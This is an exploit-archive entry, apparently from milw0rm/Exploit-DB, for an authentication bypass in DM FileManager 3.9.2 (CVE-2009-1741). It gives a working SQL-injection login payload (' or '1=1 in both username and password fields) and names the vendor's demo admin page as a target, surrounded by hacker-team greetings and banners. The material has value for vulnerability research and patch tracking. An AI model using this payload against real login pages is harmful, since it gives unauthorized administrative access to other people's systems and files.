DM FileManager 3.9.2 - Authentication Bypass

Author: snakespc
type: webapps
platform: php
port: 
date_added: 2009-05-18 
date_updated:  
verified: 1 
codes: OSVDB-54597;CVE-2009-1741 
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------AllaH AkbaR-------------------------------
dm-filemanager (Auth Bypass) Remote Sql Injection
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
-------------------------SNAKES TEAM-------------------------------------
http://dutchmonkey.com/products/dm-filemanager/demo/admin
-------------------------SNAKES TEAM-------------------------------------
Exploit:
-----------
Username:   ' or '1=1
Password:   ' or '1=1
-------------------------SNAKES TEAM-------------------------------------
His0k4:::Mr.HCOCA_MAN:::DrEaDFuL:::
yassine_enpsunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-19]